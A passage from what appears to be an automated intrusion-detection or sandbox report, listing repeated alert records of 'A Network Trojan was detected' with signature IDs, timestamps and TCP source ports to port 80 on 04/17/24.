                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:07.152097
                SID:2021641
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:28.314689
                SID:2021641
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:04.154071
                SID:2025381
                Source Port:49760
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:46.390927
                SID:2024313
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:50.868001
                SID:2024313
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:53.924913
                SID:2025381
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:46.390927
                SID:2024318
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:02.984312
                SID:2024318
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:02.659962
                SID:2021641
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:17.652364
                SID:2025381
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:40.424546
                SID:2025381
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:23.842884
                SID:2024318
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:37.366005
                SID:2024313
                Source Port:49783
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:32.922641
                SID:2021641
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:50.868001
                SID:2024318
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:23.842884
                SID:2024313
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:37.366005
                SID:2024318
                Source Port:49783
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:31.711088
                SID:2025381
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:36.230211
                SID:2025381
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:56.686682
                SID:2024313
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:26.814059
                SID:2025381
                Source Port:49776
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:22.632421
                SID:2024313
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:47.288202
                SID:2021641
                Source Port:49749
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:47.882152
                SID:2021641
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:22.368817
                SID:2024318
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:22.368817
                SID:2024313
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:55.317148
                SID:2021641
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:04.956657
                SID:2024313
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:05.666467
                SID:2021641
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:25.655732
                SID:2025381
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:39.820705
                SID:2021641
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:22.632421
                SID:2024318
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:56.686682
                SID:2024318
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:04.956657
                SID:2024318
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:25.351055
                SID:2025381
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:29.847908
                SID:2021641
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:11.695407
                SID:2025381
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:16.164912
                SID:2025381
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:28.661125
                SID:2024318
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:37.986053
                SID:2024313
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:28.661125
                SID:2024313
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:19.154295
                SID:2021641
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:42.872387
                SID:2024313
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:33.230598
                SID:2024318
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:33.230598
                SID:2024313
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:48.803719
                SID:2025381
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:14.663282
                SID:2021641
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:42.872387
                SID:2024318
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:10.136681
                SID:2021641
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:37.986053
                SID:2024318
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:50.302449
                SID:2024313
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:52.374211
                SID:2025381
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:24.136611
                SID:2021641
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:50.302449
                SID:2024318
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:53.372679
                SID:2025381
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:01.176692
                SID:2024313
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:08.603347
                SID:2024313
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:51.797146
                SID:2021641
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:43.385034
                SID:2021641
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:41.291392
                SID:2025381
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:01.176692
                SID:2024318
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:08.625526
                SID:2024313
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:17.867642
                SID:2024318
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:20.835118
                SID:2025381
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:52.381113
                SID:2021641
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:59.708947
                SID:2021641
                Source Port:49711
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:20.757055
                SID:2025381
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:50.877994
                SID:2021641
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:08.603347
                SID:2024318
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:17.867642
                SID:2024313
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:44.338890
                SID:2021641
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:08.625526
                SID:2024318
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:11.616140
                SID:2025381
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:54.967221
                SID:2025381
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:53.759072
                SID:2024318
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:58.235959
                SID:2024313
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:19.349314
                SID:2024313
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:14.912121
                SID:2024313
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:55.317148
                SID:2025381
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:19.349314
                SID:2024318
                Source Port:49771
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:11.695407
                SID:2024313
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:41.923839
                SID:2024313
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:28.661125
                SID:2025381
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:48.803719
                SID:2021641
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:53.759072
                SID:2024313
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:11.695407
                SID:2024318
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:53.372679
                SID:2024318
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:41.923839
                SID:2024318
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:53.372679
                SID:2024313
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:13.162928
                SID:2025381
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:37.366005
                SID:2021641
                Source Port:49783
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:31.393355
                SID:2025381
                Source Port:49779
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:10.084965
                SID:2021641
                Source Port:49765
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:58.235959
                SID:2024318
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:14.912121
                SID:2024318
                Source Port:49768
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:56.686682
                SID:2021641
                Source Port:49755
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:29.847908
                SID:2024318
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:39.820705
                SID:2024318
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:22.632421
                SID:2021641
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:35.861538
                SID:2025381
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:43.385034
                SID:2025381
                Source Port:49787
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:08.625526
                SID:2025381
                Source Port:49764
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:22.368817
                SID:2021641
                Source Port:49773
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:44.338890
                SID:2025381
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:59.708947
                SID:2025381
                Source Port:49711
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:39.820705
                SID:2024313
                Source Port:49743
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:16.378463
                SID:2025381
                Source Port:49769
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:05.666467
                SID:2024318
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:04.956657
                SID:2021641
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:07.139176
                SID:2025381
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:30.128575
                SID:2021641
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:05.666467
                SID:2024313
                Source Port:49761
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:29.847908
                SID:2024313
                Source Port:49778
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:19.154295
                SID:2024318
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:46.390927
                SID:2025381
                Source Port:49789
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:33.230598
                SID:2021641
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:49.380266
                SID:2024318
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:24.136611
                SID:2024318
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:19.154295
                SID:2024313
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:42.872387
                SID:2021641
                Source Port:49745
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:02.984312
                SID:2025381
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:45.817567
                SID:2024318
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:45.817567
                SID:2024313
                Source Port:49748
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:49.380266
                SID:2024313
                Source Port:49791
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:50.868001
                SID:2025381
                Source Port:49792
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:01.257517
                SID:2021641
                Source Port:49712
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:07.152097
                SID:2025381
                Source Port:49762
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:52.374211
                SID:2021641
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:44.899678
                SID:2021641
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:58.145128
                SID:2025381
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:14.663282
                SID:2024313
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:37.986053
                SID:2021641
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:24.136611
                SID:2024313
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:56.772780
                SID:2021641
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:14.663282
                SID:2024318
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:34.395592
                SID:2021641
                Source Port:49781
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:13.442138
                SID:2025381
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:25.351055
                SID:2021641
                Source Port:49775
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:34.754471
                SID:2021641
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:02.659962
                SID:2025381
                Source Port:49759
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:27.158635
                SID:2024313
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:26.814059
                SID:2024313
                Source Port:49776
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:50.877994
                SID:2024312
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:17.867642
                SID:2021641
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:26.814059
                SID:2024318
                Source Port:49776
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:36.230211
                SID:2024313
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:27.158635
                SID:2024318
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:38.899573
                SID:2025381
                Source Port:49784
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:36.230211
                SID:2024318
                Source Port:49741
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:25.655732
                SID:2021641
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:50.877994
                SID:2024317
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:47.882152
                SID:2025381
                Source Port:49790
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:10.084965
                SID:2024318
                Source Port:49765
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:58.235959
                SID:2021641
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:58.145128
                SID:2024318
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:37.986053
                SID:2025381
                Source Port:49742
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:48.803719
                SID:2024318
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:50.877994
                SID:2025381
                Source Port:49705
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:07.139176
                SID:2021641
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:53.372679
                SID:2021641
                Source Port:49753
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:48.803719
                SID:2024313
                Source Port:49750
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:16:53.759072
                SID:2021641
                Source Port:49707
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:50.302449
                SID:2025381
                Source Port:49751
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:41.291392
                SID:2021641
                Source Port:49744
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:24.136611
                SID:2025381
                Source Port:49733
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:41.923839
                SID:2021641
                Source Port:49786
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:10.136681
                SID:2025381
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:58.145128
                SID:2024313
                Source Port:49756
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:10.084965
                SID:2024313
                Source Port:49765
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:13.162928
                SID:2021641
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:17.867642
                SID:2025381
                Source Port:49770
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:38.899573
                SID:2024313
                Source Port:49784
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:38.899573
                SID:2024318
                Source Port:49784
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:52.381113
                SID:2025381
                Source Port:49793
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:31.711088
                SID:2024313
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:13.442138
                SID:2021641
                Source Port:49767
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:20.835118
                SID:2021641
                Source Port:49772
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:20.757055
                SID:2024318
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:01.176692
                SID:2025381
                Source Port:49758
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:31.711088
                SID:2024318
                Source Port:49738
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:11.616140
                SID:2024318
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:08.603347
                SID:2025381
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:20.757055
                SID:2024313
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:11.616140
                SID:2024313
                Source Port:49766
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:51.797146
                SID:2025381
                Source Port:49752
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:11.695407
                SID:2021641
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:33.230598
                SID:2025381
                Source Port:49739
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:30.128575
                SID:2024318
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:30.128575
                SID:2024313
                Source Port:49737
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:53.924913
                SID:2024318
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:37.366005
                SID:2025381
                Source Port:49783
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:53.924913
                SID:2024313
                Source Port:49794
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:32.922641
                SID:2025381
                Source Port:49780
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:23.842884
                SID:2025381
                Source Port:49774
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:28.314689
                SID:2025381
                Source Port:49777
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:35.861538
                SID:2021641
                Source Port:49782
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:40.424546
                SID:2021641
                Source Port:49785
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:18:44.899678
                SID:2024318
                Source Port:49788
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:54.967221
                SID:2021641
                Source Port:49754
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/17/24-03:17:01.257517
                SID:2024318
                Source Port:49712
